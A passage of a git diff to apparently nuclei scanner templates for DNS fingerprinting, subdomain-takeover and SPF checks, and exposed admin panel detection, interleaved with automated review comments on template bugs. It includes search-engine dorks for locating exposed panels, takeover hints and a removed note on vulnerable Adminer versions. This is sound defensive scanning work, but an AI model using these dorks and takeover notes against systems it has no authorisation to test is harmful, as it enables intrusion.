".nsone.net" - - - type: word - name: tierranet - condition: or - words: - - "ns1.domaindiscover.com" - - "ns2.domaindiscover.com" - - - type: word - name: yahoo - condition: or - words: - - "yns1.yahoo.com" - - "yns2.yahoo.com" diff --git a/dns/cname-fingerprint.yaml b/dns/cname-fingerprint.yaml new file mode 100644 index 0000000000..7f03f7f68f --- /dev/null +++ b/dns/cname-fingerprint.yaml @@ -0,0 +1,30 @@ +id: cname-fingerprint + +info: + name: CNAME Fingerprint + author: pdteam + severity: info + description: A CNAME DNS record was discovered. + reference: + - https://www.theregister.com/2021/02/24/dns_cname_tracking/ + - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/ + classification: + cwe-id: CWE-200 + tags: dns,cname + +dns: + - name: "{{FQDN}}" + type: NS + + matchers: + - type: word + words: + - "IN\tCNAME" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/cname-service-detection.yaml b/dns/cname-service-detection.yaml index 2e16efc356..4a441a0b4d 100644 --- a/dns/cname-service-detection.yaml +++ b/dns/cname-service-detection.yaml @@ -1,17 +1,19 @@ id: cname-service-detection info: - name: cname service detection + name: CNAME Service Detection author: pdteam severity: info - tags: dns + description: A CNAME service was detected. + reference: + - https://ns1.com/resources/cname + classification: + cwe-id: CWE-200 + tags: dns,service dns: - name: "{{FQDN}}" type: CNAME - class: inet - recursion: true - retries: 3 matchers-condition: or matchers: @@ -34,3 +36,5 @@ dns: name: wix words: - "wixdns.net" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 7f0f4ec6ea..88e0a62c5b 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml 
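Review bot: The request in the new cname-fingerprint template queries `type: NS`, while its id, its matcher (`IN\tCNAME`) and its extractor all target CNAME records, which looks like a copy of the NS fingerprint with the type left unchanged. A resolver will usually include the CNAME in the answer for any query against an aliased name, so the template may still fire, but the intent is clearly `type: CNAME`, the same type the sibling cname-service-detection template in this commit uses. Changing that one line makes the template do what its name says and avoids depending on resolver behaviour for non-CNAME queries.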
@@ -1,22 +1,23 @@ id: detect-dangling-cname info: - name: Detect Dangling cname + name: CNAME Detect Dangling author: pdteam,nytr0gen severity: info - tags: dns,takeover + description: A CNAME detect dangling condition was discovered. Most commonly this relates to failing to remove records from the zone once they are no longer needed. reference: - https://securitytrails.com/blog/subdomain-takeover-tips - https://nominetcyber.com/dangling-dns-is-no-laughing-matter/ - https://nabeelxy.medium.com/dangling-dns-records-are-a-real-vulnerability-361f2a29d37f - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover + classification: + cwe-id: CWE-200 + tags: dns,takeover dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 + matchers-condition: and matchers: - type: word @@ -32,3 +33,5 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/dns-waf-detect.yaml b/dns/dns-waf-detect.yaml index 2c7870a1f1..d6752592dc 100644 --- a/dns/dns-waf-detect.yaml +++ b/dns/dns-waf-detect.yaml @@ -4,20 +4,17 @@ info: name: DNS WAF Detection author: lu4nx severity: info + description: A DNS WAF was detected. + classification: + cwe-id: CWE-200 tags: tech,waf,dns dns: - name: "{{FQDN}}" type: CNAME - recursion: true - retries: 5 - class: inet - name: "{{FQDN}}" type: NS - recursion: true - retries: 5 - class: inet matchers: - type: word @@ -170,3 +167,5 @@ dns: name: edns words: - ".iidns.com" + +# Enhanced by mp on 2022/03/13 diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml index 7c64193c85..6563ec92fd 100644 --- a/dns/dnssec-detection.yaml +++ b/dns/dnssec-detection.yaml 
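Review bot: The renamed `name: CNAME Detect Dangling` and the added `description: A CNAME detect dangling condition was discovered.` do not tell the reader what was actually found; the original `Detect Dangling cname` was at least grammatical. Suggest `name: Dangling CNAME Detection` and `description: A CNAME record was discovered whose target no longer resolves (a dangling CNAME), most commonly because the record was not removed from the zone after the resource it pointed to was decommissioned. Dangling records are a precondition for subdomain takeover.` The matcher words that define the condition sit outside this hunk, so the exact check is inferred from the template name rather than read from the diff.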
@@ -2,21 +2,24 @@ id: dnssec-detection info: name: DNSSEC Detection - description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled. author: pdteam severity: info + description: Domain Name System Security Extensions (DNSSEC) are enabled. The Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled. + reference: + - https://www.icann.org/resources/pages/dnssec-what-is-it-why-important-2019-03-05-en + - https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ + classification: + cwe-id: CWE-200 tags: dns,dnssec - reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/ dns: - name: "{{FQDN}}" type: DS - class: inet - recursion: true - retries: 3 extractors: - type: regex group: 1 regex: - "IN\tDS\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/ec2-detection.yaml b/dns/ec2-detection.yaml index f8f9b9a950..9ffb7ee163 100644 --- a/dns/ec2-detection.yaml +++ b/dns/ec2-detection.yaml @@ -1,21 +1,24 @@ id: ec2-detection info: - name: AWS EC2 detection + name: AWS EC2 Detection author: melbadry9 severity: info + description: Amazon Elastic Compute Cloud (EC2) detected. + reference: + - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state + classification: + cwe-id: CWE-200 tags: dns,ec2,aws - reference: https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state dns: - name: "{{FQDN}}" type: CNAME - class: inet - recursion: true - retries: 2 extractors: - type: regex regex: - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/elasticbeantalk-takeover.yaml b/dns/elasticbeantalk-takeover.yaml index d8b6ddfc4f..99d5168687 100644 --- a/dns/elasticbeantalk-takeover.yaml +++ b/dns/elasticbeantalk-takeover.yaml 
@@ -1,14 +1,19 @@ id: elasticbeantalk-takeover info: - name: ElasticBeanTalk takeover detection + name: ElasticBeanTalk Subdomain Takeover Detection author: philippedelteil,rotemreiss severity: high + description: ElasticBeanTalk subdomain takeover detected. A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical + name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 # kudos to @m7mdharoun for sharing process details. + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/147 - https://twitter.com/payloadartist/status/1362035009863880711 - https://www.youtube.com/watch?v=srKIqhj_ki8 - tags: dns,takeover,aws + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-404 metadata: comments: | Only CNAMEs with region specification are hijackable. @@ -19,13 +24,11 @@ info: For example: CNAME - 2rs3c.eu-west-1.elasticbeanstalk.com Command - aws elasticbeanstalk check-dns-availability --region eu-west-1 --cname-prefix 2rs3c + tags: dns,takeover,aws dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 matchers-condition: and matchers: @@ -43,3 +46,5 @@ dns: group: 1 regex: - "IN\tCNAME\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/mx-fingerprint.yaml b/dns/mx-fingerprint.yaml new file mode 100644 index 0000000000..36798b8b87 --- /dev/null +++ b/dns/mx-fingerprint.yaml 
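Review bot: The added `description:` in elasticbeantalk-takeover is a plain scalar that wraps onto a second line (`... has a canonical` / `name (CNAME) in the Domain Name System ...`); YAML only folds that continuation into the value if the second line is indented deeper than the `description` key, and the collapsed diff does not show that indentation, so this may fail to parse or be mis-read as a new key. A folded block scalar, `description: >-` with the sentences indented beneath it, makes the multi-line value unambiguous and survives reformatting. The same wrapped-description pattern appears in servfail-refused-hosts in this commit.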
@@ -0,0 +1,30 @@ +id: mx-fingerprint + +info: + name: MX Record Detection + author: pdteam + severity: info + description: An MX record was detected. MX records direct emails to a mail exchange server. + reference: + - https://www.cloudflare.com/learning/dns/dns-records/dns-mx-record/ + - https://mxtoolbox.com/ + classification: + cwe-id: CWE-200 + tags: dns,mx + +dns: + - name: "{{FQDN}}" + type: MX + + matchers: + - type: word + words: + - "IN\tMX" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tMX\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index 0b0ea1c0d4..9a8563e2c6 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -1,24 +1,25 @@ id: mx-service-detector info: - name: E-mail service detector + name: Email Service Detector author: binaryfigments severity: info - description: Check the email service or spam filter that is used for a domain. - tags: dns + description: An email service was detected. Check the email service or spam filter that is used for a domain. + classification: + cwe-id: CWE-200 + tags: dns,service dns: - name: "{{FQDN}}" type: MX - class: inet - recursion: true - retries: 5 + matchers-condition: or matchers: - type: word name: "Office 365" words: - "mail.protection.outlook.com" + - type: word name: "Google Apps" words: @@ -27,21 +28,25 @@ dns: - "alt1.aspmx.l.google.com" - "alt2.aspmx.l.google.com" - "aspmx.l.google.com" + - type: word name: "ProtonMail" words: - "mail.protonmail.ch" - "mailsec.protonmail.ch" + - type: word name: "Zoho Mail" words: - "mx.zoho.eu" - "mx2.zoho.eu" - "mx3.zoho.eu" + - type: word name: "ForcePoint Email Security" words: - "in.mailcontrol.com" + - type: word name: "E-Zorg NL" words: 
@@ -49,24 +54,30 @@ dns: - "spamfilter01.ezorg.nl" - "spamfilter.ezorg.nl" - "spamfilter03.ezorg.nl" + - type: word name: "Kerio Cloud EU" words: - "mx1.eu1.kerio.cloud" - "mx2.eu1.kerio.cloud" + - type: word name: "Kerio Cloud US" words: - "mx1.us1.kerio.cloud" - "mx2.us1.kerio.cloud" - "mx3.us1.kerio.cloud" + - type: word name: "Proofpoint EU" words: - "mx1-eu1.ppe-hosted.com" - "mx2-eu1.ppe-hosted.com" + - type: word name: "Proofpoint US" words: - "mx1-us1.ppe-hosted.com" - "mx2-us1.ppe-hosted.com" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/nameserver-fingerprint.yaml b/dns/nameserver-fingerprint.yaml new file mode 100644 index 0000000000..2db0863467 --- /dev/null +++ b/dns/nameserver-fingerprint.yaml @@ -0,0 +1,27 @@ +id: nameserver-fingerprint + +info: + name: NS Record Detection + author: pdteam + severity: info + description: An NS record was detected. An NS record delegates a subdomain to a set of name servers. + classification: + cwe-id: CWE-200 + tags: dns,ns + +dns: + - name: "{{FQDN}}" + type: NS + + matchers: + - type: word + words: + - "IN\tNS" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tNS\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/ptr-fingerprint.yaml b/dns/ptr-fingerprint.yaml new file mode 100644 index 0000000000..6abf192f59 --- /dev/null +++ b/dns/ptr-fingerprint.yaml @@ -0,0 +1,27 @@ +id: ptr-fingerprint + +info: + name: PTR Detected + author: pdteam + severity: info + description: A PTR record was detected. A PTR record refers to the domain name. + classification: + cwe-id: CWE-200 + tags: dns,ptr + +dns: + - name: "{{FQDN}}" + type: PTR + + matchers: + - type: word + words: + - "IN\tPTR" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tPTR\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index 21722ac4c7..711fe24386 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml 
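Review bot: The new ptr-fingerprint template issues a `PTR` query for `{{FQDN}}`, but PTR records live under in-addr.arpa/ip6.arpa, so for an ordinary hostname input the query returns nothing and the template never fires. Unless the nuclei version in use reverses IP inputs into the arpa zone itself (not something the diff shows), it only produces results for IP or reverse-zone inputs, and a comment saying so would save users wondering why it is silent. The description `A PTR record refers to the domain name.` is also too vague; suggest `description: A PTR record was detected. PTR records map an IP address back to a hostname (reverse DNS) and are queried via the in-addr.arpa or ip6.arpa zones.`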
@@ -1,19 +1,23 @@ id: servfail-refused-hosts info: - name: Servfail Host Finder + name: DNS Servfail Host Finder author: pdteam severity: info + description: A DNS ServFail error occurred. ServFail errors occur when there is an error communicating with a DNS server. This could have a number of causes, including an error on the DNS server itself, or a temporary + networking issue. + classification: + cwe-id: CWE-200 tags: dns,takeover dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 3 + matchers: - type: word words: - "SERVFAIL" - "REFUSED" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/spoofable-spf-records-ptr.yaml b/dns/spoofable-spf-records-ptr.yaml index dd8d16e525..48815cf189 100644 --- a/dns/spoofable-spf-records-ptr.yaml +++ b/dns/spoofable-spf-records-ptr.yaml @@ -1,21 +1,25 @@ id: spoofable-spf-records-ptr info: - name: Find spoofable SPF records containing the PTR mechanism + name: Spoofable SPF Records with PTR Mechanism author: binaryfigments severity: info - description: Check if TXT records in DNS for SPF records that have the PTR mechanism that is spoofable. + description: SPF records in DNS containing a PTR mechanism are spoofable. + reference: + - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability + classification: + cwe-id: CWE-200 tags: dns,spf dns: - name: "{{FQDN}}" type: TXT - class: inet - recursion: true - retries: 3 + matchers: - type: word words: - "v=spf1" - " ptr " - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/14 diff --git a/dns/txt-fingerprint.yaml b/dns/txt-fingerprint.yaml new file mode 100644 index 0000000000..4f0616a877 --- /dev/null +++ b/dns/txt-fingerprint.yaml 
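Review bot: The new `description` in servfail-refused-hosts wraps onto a second line beginning `networking issue.` as a plain scalar, which only parses if that line is indented deeper than the `description` key; the collapsed diff hides the indentation, so `description: >-` with the text indented beneath it would be the safe form. Separately, the template carries the `takeover` tag yet matches any `SERVFAIL`/`REFUSED`, which the description itself says is often a transient resolver error; adding `These hosts are candidates for further dangling-record checks, not confirmed takeovers.` to the description would help triage the findings correctly.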
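Review bot: The matcher in spoofable-spf-records-ptr still keys on the literal word `" ptr "`, so the `ptr:example.com` form and a `ptr` token at the very end of the record are missed, and the `v=spf1` check is case-sensitive although SPF terms are not; this was already true before the commit, but the rewritten description now asserts these records are spoofable, so the detection should at least cover the syntax. Replacing the word matcher with `- type: regex` / `regex:` / `- '(?i)v=spf1.*\sptr(:[^\s]+)?(\s|$)'` catches all three shapes in one line. The description would also be more useful if it said why: `SPF records using the ptr mechanism are deprecated (RFC 7208 section 5.5) and allow anyone who controls the reverse DNS of a sending IP to pass the check.`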
@@ -0,0 +1,29 @@ +id: txt-fingerprint + +info: + name: DNS TXT Record Detected + author: pdteam + severity: info + description: A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server. + reference: + - https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/ + classification: + cwe-id: CWE-200 + tags: dns,txt + +dns: + - name: "{{FQDN}}" + type: TXT + + matchers: + - type: word + words: + - "IN\tTXT" + + extractors: + - type: regex + group: 1 + regex: + - "IN\tTXT\t(.+)" + +# Enhanced by mp on 2022/03/14 diff --git a/dns/worksites-detection.yaml b/dns/worksites-detection.yaml index 9832542bb3..104017e399 100644 --- a/dns/worksites-detection.yaml +++ b/dns/worksites-detection.yaml @@ -1,19 +1,23 @@ id: detect-worksites info: - name: worksites.net service detection + name: Worksites.net Service Detection author: melbadry9 severity: info - tags: dns - reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites + description: A worksites.net service was detected. + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites + classification: + cwe-id: CWE-200 + tags: dns,service dns: - name: "{{FQDN}}" type: A - class: inet - recursion: true - retries: 2 + matchers: - type: word words: - "69.164.223.206" + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/3cx-phone-management-panel.yaml b/exposed-panels/3cx-phone-management-panel.yaml new file mode 100644 index 0000000000..1d7a536697 --- /dev/null +++ b/exposed-panels/3cx-phone-management-panel.yaml 
@@ -0,0 +1,28 @@ +id: 3cx-phone-management-panel + +info: + name: 3CX Phone System Management Console Detect + author: idealphase + severity: info + reference: + - https://www.3cx.com/ + - https://www.3cx.com/phone-system/ + - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 + metadata: + shodan-query: + - http.title:"3CX Phone System Management Console" + - http.favicon.hash:970132176 + google-query: intitle:"3CX Phone System Management Console" + tags: panel,3cx + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + words: + - "3CX Phone System Management Console" + - "Welcome to the 3CX Management Console" + condition: or diff --git a/exposed-panels/3cx-phone-webclient-management-panel.yaml b/exposed-panels/3cx-phone-webclient-management-panel.yaml new file mode 100644 index 0000000000..1c4be16616 --- /dev/null +++ b/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -0,0 +1,26 @@ +id: 3cx-phone-webclient-management-panel + +info: + name: 3CX Phone System Webclient Management Console + author: idealphase + severity: info + reference: + - https://www.3cx.com/phone-system/ + - https://www.3cx.com/blog/unified-communications/client-apps/ + - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 + metadata: + shodan-query: http.title:"3CX Webclient" + google-query: intitle:"3CX Webclient" + tags: panel,3cx + +requests: + - method: GET + path: + - '{{BaseURL}}/webclient/' + + matchers: + - type: word + words: + - " 3CX Webclient" + - '' + condition: or \ No newline at end of file diff --git a/exposed-panels/3g-wireless-gateway.yaml b/exposed-panels/3g-wireless-gateway.yaml index e53f7f09f4..d8675d9ba9 100644 --- a/exposed-panels/3g-wireless-gateway.yaml +++ b/exposed-panels/3g-wireless-gateway.yaml 
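Review bot: The word matcher in 3cx-phone-webclient-management-panel lists `- ''` as its second term under `condition: or`; if that is literally an empty string in the file, every response to `/webclient/` matches and the template reports a 3CX panel on any host, whereas if an HTML tag was stripped from it when this page was rendered the point is moot, but it is worth confirming in the raw file. Neither 3CX template has a status matcher, so a 404 page that happens to echo the path text would also match; adding `- type: status` / `status:` / `- 200` under `matchers-condition: and` is cheap insurance. The two files also disagree on the `shodan-query` shape (a list in the management-console template, a scalar in the webclient one); pick one so downstream tooling that reads metadata does not have to handle both.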
@@ -1,25 +1,32 @@ -id: 3g-wireless-gateway -info: - name: 3G wireless gateway - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7050 - tags: panel,router - -requests: - - method: GET - path: - - "{{BaseURL}}/htmlcode/html/indexdefault.asp" - - matchers-condition: and - matchers: - - type: word - words: - - "g_i3gState" - - "g_sysinfo_sim_state" - - "g_iUID" - condition: and - - - type: status - status: - - 200 +id: 3g-wireless-gateway + +info: + name: 3G Wireless Gateway Detection + author: pussycat0x + severity: info + description: A 3G wireless gateway was detected. + reference: + - https://www.exploit-db.com/ghdb/7050 + classification: + cwe-id: CWE-200 + tags: panel,router + +requests: + - method: GET + path: + - "{{BaseURL}}/htmlcode/html/indexdefault.asp" + + matchers-condition: and + matchers: + - type: word + words: + - "g_i3gState" + - "g_sysinfo_sim_state" + - "g_iUID" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/acemanager-login.yaml b/exposed-panels/acemanager-login.yaml index 396fd93468..4e352fe09e 100644 --- a/exposed-panels/acemanager-login.yaml +++ b/exposed-panels/acemanager-login.yaml 
@@ -1,32 +1,37 @@ -id: acemanager-login - -info: - name: ACEmanager detect - author: pussycat0x - severity: info - metadata: - fofa-dork: 'app="ACEmanager"' - tags: login,tech,acemanager - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '::: ACEmanager :::' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'ALEOS Version ([0-9.]+) \| Copyright &co' +id: acemanager-login + +info: + name: ACEmanager Detection + author: pussycat0x + severity: info + description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. + classification: + cwe-id: CWE-200 + metadata: + fofa-dork: app="ACEmanager" + tags: panel,login,tech,acemanager + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/acrolinx-dashboard.yaml b/exposed-panels/acrolinx-dashboard.yaml new file mode 100644 index 0000000000..8c3d55bd48 --- /dev/null +++ b/exposed-panels/acrolinx-dashboard.yaml 
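Review bot: The rewritten acemanager-login keeps the metadata key as `fofa-dork`, while the other templates touched in this commit (wifisky, acrolinx, adminset) use `fofa-query`; since the whole file is being re-emitted anyway, aligning on `fofa-query: app="ACEmanager"` keeps the metadata greppable across the repo. The `condition: and` on a single-word matcher is a no-op and can be dropped. The ALEOS version extractor is preserved unchanged, which is good, since the version string is what makes this finding actionable.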
@@ -0,0 +1,36 @@ +id: acrolinx-dashboard + +info: + name: Acrolinx Dashboard + author: ffffffff0x + severity: info + description: An Acrolinx Analytics dashboard was detected. + reference: + - https://docs.acrolinx.com/coreplatform/latest/en/analytics/acrolinx-analytics-dashboards + classification: + cwe-id: CWE-200 + metadata: + fofa-query: title=="Acrolinx Dashboard" + shodan-query: http.title:"Acrolinx Dashboard" + google-dork: inurl:"Acrolinx Dashboard" + tags: acrolinx,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/dashboard.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Acrolinx Dashboard' + - 'Acrolinx' + condition: or + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml index ea5abea227..66ec4748e9 100644 --- a/exposed-panels/active-admin-exposure.yaml +++ b/exposed-panels/active-admin-exposure.yaml @@ -4,7 +4,12 @@ info: name: ActiveAdmin Admin Dasboard Exposure author: pdteam severity: info - tags: panel + description: An ActiveAdmin Admin dashboard was discovered. + reference: + - https://activeadmin.info/ + classification: + cwe-id: CWE-200 + tags: panel,activeadmin requests: - method: GET @@ -15,4 +20,6 @@ requests: words: - "active_admin_content" - "active_admin-" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml index fcc93b5236..7f435fed9a 100644 --- a/exposed-panels/activemq-panel.yaml +++ b/exposed-panels/activemq-panel.yaml @@ -4,7 +4,12 @@ info: name: Apache ActiveMQ Exposure author: pdteam severity: info - tags: panel + description: An Apache ActiveMQ implementation was discovered. + reference: + - https://activemq.apache.org/ + classification: + cwe-id: CWE-200 + tags: panel,activemq,apache requests: - method: GET 
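Review bot: The word matcher in the new acrolinx-dashboard template combines `'Acrolinx Dashboard'` and `'Acrolinx'` with `condition: or`, so the second term subsumes the first and any page at `/dashboard.html` that merely mentions the vendor name (a product page, a 200-returning error page) is reported as an exposed dashboard. Keep only `- 'Acrolinx Dashboard'`, or pair the vendor name with a page-specific token under `condition: and`, so the finding means what the name claims. The `google-dork: inurl:"Acrolinx Dashboard"` also looks like it was meant to be `intitle:`, matching the `shodan-query` on `http.title`.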
@@ -16,4 +21,6 @@ requests: words: - '

Welcome to the Apache ActiveMQ!

' - 'Apache ActiveMQ' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/exposed-panels/acunetix-panel.yaml b/exposed-panels/acunetix-panel.yaml index 4a0bcf6c89..d9bb730073 100644 --- a/exposed-panels/acunetix-panel.yaml +++ b/exposed-panels/acunetix-panel.yaml @@ -1,9 +1,14 @@ id: acunetix-panel-detect info: - name: Acunetix Panel detector + name: Acunetix Login Panel author: joanbono severity: info + description: An Acunetix login panel was detected. + reference: + - https://www.acunetix.com/ + classification: + cwe-id: CWE-200 tags: panel requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adiscon-loganalyzer.yaml b/exposed-panels/adiscon-loganalyzer.yaml index 5f0e0bd13c..086763aa89 100644 --- a/exposed-panels/adiscon-loganalyzer.yaml +++ b/exposed-panels/adiscon-loganalyzer.yaml @@ -1,11 +1,14 @@ id: adiscon-loganalyzer info: - name: Detect exposed Adiscon LogAnalyzer + name: Adiscon LogAnalyzer Detection author: geeknik severity: high - description: Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. - reference: https://loganalyzer.adiscon.com/ + description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services. + reference: + - https://loganalyzer.adiscon.com/ + classification: + cwe-id: CWE-200 tags: adiscon,loganalyzer,syslog,exposures requests: @@ -32,3 +35,5 @@ requests: part: header words: - 'text/html' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adminer-panel.yaml b/exposed-panels/adminer-panel.yaml index d15890b1c8..0adab4e046 100644 --- a/exposed-panels/adminer-panel.yaml +++ b/exposed-panels/adminer-panel.yaml 
@@ -1,31 +1,35 @@ id: adminer-panel + info: - name: Adminer Login panel + name: Adminer Login Panel author: random_robbie,meme-lord severity: info - reference: https://blog.sorcery.ie/posts/adminer/ - tags: panel - - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds + description: An Adminer login panel was detected. + reference: + - https://blog.sorcery.ie/posts/adminer/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: title:"Login - Adminer" + tags: panel,adminer requests: - method: GET path: + - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/_adminer.php' - '{{BaseURL}}/adminer/' - - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/editor.php' - '{{BaseURL}}/mysql.php' - '{{BaseURL}}/sql.php' - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' + headers: + Accept-Language: en-US,en;q=0.5 + stop-at-first-match: true matchers-condition: and matchers: - - type: word words: - "Login - Adminer" @@ -39,4 +43,6 @@ requests: part: body group: 1 regex: - - '([0-9.]+)' \ No newline at end of file + - '([0-9.]+)' + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adminset-panel.yaml b/exposed-panels/adminset-panel.yaml new file mode 100644 index 0000000000..c539d29be5 --- /dev/null +++ b/exposed-panels/adminset-panel.yaml @@ -0,0 +1,34 @@ +id: adminset-panel + +info: + name: Adminset Login Panel + author: ffffffff0x + severity: info + description: An Adminset login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: app="AdminSet" + reference: + - https://github.com/guhongze/adminset/ + tags: adminset,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "AdminSet Login" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 
diff --git a/exposed-panels/adobe/adobe-component-login.yaml b/exposed-panels/adobe/adobe-component-login.yaml index 3200d81577..1d46e94118 100644 --- a/exposed-panels/adobe/adobe-component-login.yaml +++ b/exposed-panels/adobe/adobe-component-login.yaml @@ -1,11 +1,17 @@ -id: adobe-component-login +id: adobe-coldfusion-login info: - name: Adobe Component Browser Login + name: Adobe ColdFusion Component Browser Login Panel author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6846 - tags: panel + description: An Adobe ColdFusion Component Browser login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6846 + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: panel,adobe,coldfusion requests: - method: GET @@ -21,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adobe/adobe-connect-central-login.yaml b/exposed-panels/adobe/adobe-connect-central-login.yaml index 1218c9f8d7..9f025cb957 100644 --- a/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -1,10 +1,15 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk severity: info - tags: adobe,panel + description: An Adobe Connect Central login panel was detected. + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cwe-id: CWE-200 + tags: adobe,panel,connect-central requests: - method: GET @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/exposed-panels/adobe/adobe-experience-manager-login.yaml b/exposed-panels/adobe/adobe-experience-manager-login.yaml index 2c1f158cea..c1a0f41886 100644 --- a/exposed-panels/adobe/adobe-experience-manager-login.yaml +++ b/exposed-panels/adobe/adobe-experience-manager-login.yaml 
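Review bot: The id is changed to `adobe-coldfusion-login` while the file keeps its path `exposed-panels/adobe/adobe-component-login.yaml`, so template id and filename no longer agree, which makes `-id` filtering and index cross-referencing harder. Either rename the file to match or keep `id: adobe-component-login`. The same id/filename divergence is visible in `advance-setup.yaml` (`id: advanced-setup-login`), `airflow-panel.yaml` (`id: airflow-admin-login-panel`) and the new `argocd-login.yaml` (`id: argocd-detect`).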
